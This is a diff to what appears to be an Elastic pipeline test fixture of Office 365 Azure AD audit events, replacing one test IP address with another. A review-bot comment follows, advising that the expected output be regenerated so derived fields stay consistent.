@@ -2265,7 +2265,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2295,9 +2295,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { 
@@ -2531,7 +2531,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -2561,9 +2561,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
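Review bot: The new ActorIpAddress/ClientIP values in this hunk are only the raw copies of the fields; any pipeline-derived fields this fixture also carries for the same event (source/client/related ip, geo or AS enrichment, if the pipeline produces them) lie outside the hunk, so I cannot confirm from here that they moved to 67.43.156.15 in step. If the file was patched by hand rather than regenerated, those derived fields would now disagree with the raw ones and the pipeline test would fail on them; regenerating the expected output (`elastic-package test pipeline --generate`) keeps every copy consistent. The same applies to the hunks at 2827, 3093 and 3359, while the `original` strings at 2797, 3063 and 3329 already carry the new address consistently with their parsed fields.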
